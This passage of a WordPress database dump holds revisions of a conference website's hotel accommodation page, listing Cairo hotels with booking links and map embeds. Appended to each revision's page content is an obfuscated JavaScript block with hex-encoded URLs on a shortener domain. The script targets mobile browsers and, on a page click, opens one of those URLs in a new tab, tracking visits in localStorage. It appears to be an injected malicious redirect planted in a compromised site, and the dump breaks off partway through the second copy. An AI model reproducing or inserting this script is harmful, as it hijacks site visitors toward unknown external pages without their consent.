href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\"]</p>\n<h2>Steigenberger Hotel El Tahrir</h2>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p style=\"text-align: center;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></p>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:04:41','2023-07-18 22:04:41','',2685,'https://gsw2023.com/?p=5012',0,'revision','',0),
(5013,1,'2023-07-18 22:09:26','2023-07-18 22:09:26','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\"]</p>\n<h2>Steigenberger Hotel El Tahrir</h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></li>\n</ul>\n<p style=\"text-align: center;\">\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\